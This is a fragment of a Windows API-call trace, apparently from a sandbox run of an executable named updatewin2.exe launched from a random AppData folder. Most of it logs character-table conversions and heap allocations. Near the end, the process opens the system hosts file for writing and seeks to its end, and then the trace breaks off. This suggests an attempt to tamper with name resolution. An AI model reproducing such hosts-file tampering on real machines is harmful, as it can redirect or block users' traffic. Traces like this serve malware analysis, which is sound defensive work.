¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0078.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17\x9bÝ¿`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0078.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x80) returned 0x5ca3e8 [0078.876] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe")) returned 0x5f [0078.876] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xc8) returned 0x5cc478 [0078.876] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0078.876] GetLastError () returned 0x0 [0078.877] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.877] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0078.887] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1423) returned 0x5ceaf8 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1423) returned 0x5cff28 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc118 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5cd5d0 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc140 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x30) returned 0x5b5490 [0078.888] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd5d0 | out: hHeap=0x5a0000) returned 1 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc168 [0078.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x48) returned 0x5cd5d0 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5490 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc190 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x60) returned 0x5cd620 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd5d0 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x90) returned 0x5cd688 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd620 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc1b8 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd8) returned 0x5cd720 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd688 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc1e0 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc208 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x138) returned 0x5cd5d0 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd720 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc230 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc258 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc280 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc2a8 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c8) returned 0x5cd710 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd5d0 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc2d0 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc2f8 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc320 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc348 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2a0) returned 0x5d1358 [0078.889] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd710 | out: hHeap=0x5a0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc370 [0078.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc398 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc3c0 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc3e8 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc410 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5cc438 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1618 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1640 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x3f0) returned 0x5cd5d0 [0078.890] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1358 | out: hHeap=0x5a0000) returned 1 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1668 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1690 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d16b8 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d16e0 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1708 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1730 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1758 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1780 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d17a8 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x5e8) returned 0x5d1e00 [0078.890] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cd5d0 | out: hHeap=0x5a0000) returned 1 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d17d0 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d17f8 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1820 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1848 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1870 [0078.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1898 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d18c0 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d18e8 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1910 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1938 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8d0) returned 0x5d23f0 [0078.891] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d1e00 | out: hHeap=0x5a0000) returned 1 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1960 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1988 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d19b0 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d19d8 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1a00 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1a28 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1a50 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1a78 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1aa0 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1ac8 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1af0 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1b18 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1b40 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1b68 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1b90 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1bb8 [0078.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd38) returned 0x5d2cc8 [0078.891] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d23f0 | out: hHeap=0x5a0000) returned 1 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1be0 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1c08 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1c30 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1c58 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1c80 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1ca8 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1cd0 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1cf8 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1d20 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1d48 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1d70 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1d98 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1dc0 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1e18 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1e40 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1e68 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1e90 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1eb8 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1ee0 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1f08 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1f30 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1f58 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1f80 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1fa8 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1fd0 [0078.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d1ff8 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2020 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2048 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x13eb) returned 0x5d3a08 [0078.893] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d2cc8 | out: hHeap=0x5a0000) returned 1 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2070 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2098 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d20c0 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d20e8 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x30) returned 0x5b5490 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2110 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2138 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2160 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2188 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d21b0 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d21d8 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2200 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2228 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2250 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2278 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d22a0 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d22c8 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d22f0 [0078.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2318 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2340 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2368 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2390 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d23b8 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d23e0 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2408 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2430 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2458 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2480 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d24a8 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d24d0 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d24f8 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2520 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2548 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2570 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2598 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d25c0 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2618 [0078.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1dc3) returned 0x5d4e00 [0078.894] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d3a08 | out: hHeap=0x5a0000) returned 1 [0078.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2640 [0078.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2668 [0078.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2690 [0078.988] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d26b8 [0078.988] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d26e0 [0078.988] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2708 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2730 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2758 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2780 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d27a8 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d27d0 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d27f8 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2820 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2848 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2870 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2898 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d28c0 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d28e8 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2910 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2938 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2960 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2988 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d29b0 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d29d8 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2a00 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2a28 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2a50 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2a78 [0078.989] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5d2aa0 [0078.989] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cff28 | out: hHeap=0x5a0000) returned 1 [0078.989] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0078.994] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0078.994] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0078.995] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0078.995] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x30) returned 0x5b5500 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x47) returned 0x5d0110 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5500 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a) returned 0x5d0160 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0110 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9e) returned 0x5d01d8 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0160 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xec) returned 0x5d0280 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d01d8 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x161) returned 0x5d0110 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0280 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x211) returned 0x5d0280 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0110 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x319) returned 0x5d04a0 [0078.995] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5d0280 | out: hHeap=0x5a0000) returned 1 [0078.995] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, 